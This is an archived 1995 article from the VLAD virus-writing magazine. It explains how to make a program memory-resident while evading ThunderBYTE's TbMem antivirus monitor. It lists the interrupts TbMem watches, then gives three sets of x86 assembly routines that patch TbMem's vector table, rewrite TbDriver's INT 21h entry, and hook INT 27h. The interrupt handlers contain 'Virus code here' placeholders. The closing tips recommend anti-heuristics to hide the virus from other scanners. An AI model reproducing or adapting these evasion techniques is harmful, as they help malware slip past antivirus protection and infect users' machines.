Cuteskunk BBS

home *** CD-ROM | disk | FTP | other *** search

/ Cuteskunk BBS / cuteskunk.zip / cuteskunk / Virus / Virus-Magazines / Vlad / vlad#4.zip / ARTICLE.2_6 < prev next >

Wrap

Text File | 1995-04-25 | 12KB | 318 lines

T B M E M F L A W S Written by Darkman/VLAD ──────────── Introduction ──────────── This document is another example of how to make a program resident in memory without the memory resident of ThunderBYTE Anti-Virus: TbMem detects it. This document also covers which interrupts are hooked by TbMem and which interrupts are monitored by TbMem. All examples in this document will hook interrupt 21h. ──────────────────────────── Thunderbyte B.V. about TbMem ──────────────────────────── Controlling memory: TbMem TbMem detects attempts from programs to remain resident in memory, and ensures that no program can remain resident in memory without permis- sion. Since most viruses remain resident in memory, this is a powerful weapon against all such viruses, known or unknown. Permission informa- tion is maintained in the Anti-Vir.Dat files. TbMem also protects your CMOS memory against unwanted modifications. ─────────────────────────- Interrupts hooked by TbMem ────────────────────────── These interrupts are hooked by TbMem: INT 09h (IRQ 1 Keyboard) [TBSeg:0269] INT 2Fh (Software Multiplex) [TBSeg:00DB] ────────────────────────────- Interrupts monitored by TbMem ───────────────────────────── These interrupts are monitored by TbMem: INT 08h (IRQ 0 System timer) [TBSeg:0060] INT 09h (IRQ 1 Keyboard) [TBSeg:0064] INT 10h (BIOS System Video Services) [TBSeg:0068] INT 13h (BIOS Fixed disk/FDD Services) [TBSeg:004C] INT 15h (BIOS System Services) [TBSeg:0088] INT 16h (BIOS Keyboard Services) [TBSeg:006C] INT 17h (BIOS Printer Services (LPT)) [TBSeg:007C] INT 1Ah (BIOS Real-Time Clock Services) [TBSeg:0074] INT 1Ch (BIOS User Timer Tick) [TBSeg:005C] INT 20h (DOS Program Terminate) [TBSeg:0050] INT 21h (DOS Function call) [TBSeg:0054] INT 26h (DOS Absolute Disk Write) [TBSeg:0090] INT 28h (DOS Idle) [TBSeg:0070] INT 29h (DOS Fast Console Output) [TBSeg:0078] INT 2Ah (Local Area Network) [TBSeg:0098] INT 2Fh (Software Multiplex) [TBSeg:0058] INT 40h (BIOS Diskette Service) [TBSeg:008C] INT 50h (BIOS Reserved) [TBSeg:0094] INT 70h (IRQ 8 AT Real Time Clock) [TBSeg:0080] INT 76h (IRQ 14 AT Fixed Disk) [TBSeg:0084] TbMem will also warn the user if INT 27h (DOS Terminate and Stay Res.) or INT 21h, function 31h (DOS Function call, Terminate but stay resident) is called. ─────────────────────- How to trick TbMem 1/3 ────────────────────── The below code must be included to trick TbMem 1/3: 1. Hook interrupt 21h. 2. Modify TbMems interrupt vector table. ─────────────────- Hook interrupt 21h ────────────────── The below code shows an example of how to hook interrupt 21h: ;------------------------------------------------------------=< cut here >=--- push ds ; Save DS at stack xor ax,ax ; Clear AX mov ds,ax ; DS = segment of interrupt table lea di,int21adr ; DI = offset of int21adr mov si,(21h*04h) ; SI = offset of interrupt 21h movsw ; Store address of interrupt 21h \ movsw ; in int21adr / mov word ptr ds:[21h*04h],offset int21handler mov ds:[21h*04h+02h],es ; Intercept interrupt 21h pop ds ; Load DS from stack ;------------------------------------------------------------=< cut here >=--- ───────────────────────────────────- Modify TbMems interrupt vector table ──────────────────────────────────── The below code shows an example of how to modify TbMems interrupt vector table: ;------------------------------------------------------------=< cut here >=--- push ds ; Save DS at stack xor ax,ax ; Clear AX mov ds,ax ; DS = segment of interrupt vectors mov ds,ds:[09h*04+02h] ; DS = Segment of TbMem mov word ptr ds:[0054h],offset int21handler mov ds:[0056h],es ; Modify the segment of interrupt 21h push ds ; Save DS at stack ;------------------------------------------------------------=< cut here >=--- ────────────────────── How to trick TbMem 2/3 ─────────────────────- The below code must be included to trick TbMem 2/3: 1. Installation check. 2. Hook interrupt 60h. 3. Modify TbDrivers interrupt 21h. 4. Interrupt 60h handler. ─────────────────- Installation check ─────────────────- The below code shows an example of how to check if the trick allready has been installed: ;------------------------------------------------------------=< cut here >=--- mov ax,63ffh ; Interrupt 21h service int 21h ; Do it! cmp ax,bx ; Already resident? je trickexit ; Equal? Jump to trickexit ; Trick TbMem here... trickexit: ;------------------------------------------------------------=< cut here >=--- ─────────────────- Hook interrupt 60h ────────────────── The below code shows an example of how to hook interrupt 60h: ;------------------------------------------------------------=< cut here >=--- push ds ; Save DS at stack xor ax,ax ; Clear AX mov ds,ax ; DS = segment of interrupt table mov word ptr ds:[60h*04h],offset int60handler mov ds:[60h*04h+02h],es ; Intercept interrupt 60h pop ds ; Load DS from stack ;------------------------------------------------------------=< cut here >=--- ─────────────────────────────- Modify TbDrivers interrupt 21h ────────────────────────────── The below code shows an example of how to modify TbDrivers interrupt 21h: ;------------------------------------------------------------=< cut here >=--- push ds ; Save DS at stack xor ax,ax ; Clear AX mov ds,ax ; DS = segment of interrupt vectors lds si,ds:[21h*04h] ; Get address of interrupt 21h mov [si],060cdh ; Write a INT 60h instruction pop ds ; Load DS from stack ;------------------------------------------------------------=< cut here >=--- ────────────────────- Interrupt 60h handler ────────────────────- The below code shows an example of an interrupt 60h handler: ;------------------------------------------------------------=< cut here >=--- int60handler proc near ; Interrupt 60h handler cmp ax,63ffh ; Interrupt 60h service? je int60servi ; Equal? Jump to int60servi ; Virus code here... iret ; Interrupt return! int60servi: mov bx,ax iret ; Interrupt return! endp ;------------------------------------------------------------=< cut here >=--- ─────────────────────- How to trick TbMem 3/3 ─────────────────────- The below code must be included to trick TbMem 3/3: 1. Installation check. 2, Hook interrupt 27h. 3. Interrupt 27h handler. 4. Interrupt 21h handler. ─────────────────- Installation check ─────────────────- The below code shows an example of how to check if the trick allready has been installed: ;------------------------------------------------------------=< cut here >=--- push ds ; Save DS at stack xor ax,ax ; Clear AX mov ds,ax ; DS = segment of interrupt vectors lds si,ds:[27h*04h] ; Get address of interrupt 27h cmp [si],5350h ; Interrupt 27h hooked? pop ds ; Load DS from stack je trickexit ; Already hooked? Jump to trickexit ; Trick TbMem here... trickexit: ;------------------------------------------------------------=< cut here >=--- ─────────────────- Hook interrupt 27h ─────────────────- The below code shows an example of how to hook interrupt 27h: ;------------------------------------------------------------=< cut here >=--- push ds ; Save DS at stack xor ax,ax ; Clear AX mov ds,ax ; DS = segment of interrupt table lea di,int27adr ; DI = offset of int27adr mov si,(27h*04h) ; SI = offset of interrupt 27h movsw ; Store address of interrupt 27h \ movsw ; in int27adr / mov word ptr ds:[27h*04h],offset int27handler mov ds:[27h*04h+02h],es ; Intercept interrupt 27h pop ds ; Load DS from stack ;------------------------------------------------------------=< cut here >=--- ────────────────────- Interrupt 27h handler ────────────────────- The below code shows an example of an interrupt 27h handler: ;------------------------------------------------------------=< cut here >=--- int27handler proc near ; Interrupt 27h handler push ax ; Save AX at stack push bx ; Save BX at stack mov ax,63feh ; Interrupt 21h service int 21h ; Do it! cmp ax,bx ; Already resident? je int27exit ; Equal? Jump to int27exit push di ; Save DI at stack push si ; Save SI at stack push ds ; Save DS at stack push es ; Save ES at stack xor ax,ax ; Clear AX mov ds,ax ; DS = segment of interrupt table push cs ; Save CS at stack pop es ; Load ES from stack lea di,int21adr ; DI = offset of int21adr mov si,(21h*04h) ; SI = offset of interrupt 21h movsw ; Store address of interrupt 21h \ movsw ; in int21adr / mov word ptr ds:[21h*04h],offset int21handler mov ds:[21h*04h+02h],cs ; Intercept interrupt 21h pop es ; Load ES from stack pop ds ; Load DS from stack pop si ; Load SI from stack pop di ; Load DI from stack int27exit: pop bx ; Load BX from stack pop ax ; Load AX from stack db 0eah ; Object code of jump far int27adr dd ? ; Address of interrupt 27h endp ;------------------------------------------------------------=< cut here >=--- ────────────────────- Interrupt 21h handler ────────────────────- The below code shows an example of an interrupt 21h handler: ;------------------------------------------------------------=< cut here >=--- int21handler proc near ; Interrupt 21h handler cmp ax,63feh ; Interrupt 21h service? je int21servi ; Equal? Jump to int21servi ; Virus code here... db 0eah ; Object code of jump far int21adr dd ? ; Address of interrupt 21h int21servi: mov bx,ax iret ; Interrupt return! endp ;------------------------------------------------------------=< cut here >=--- ────────────────────- Final tips and tricks ────────────────────- - Detect TbMem before using these tricks. - These examples were tested with ThunderBYTE Anti-Virus v 6.32. - Use a lot anti-heuristics, so other programs can't find the virus either. - Look also at Catch-22 by Rhincewind/VLAD.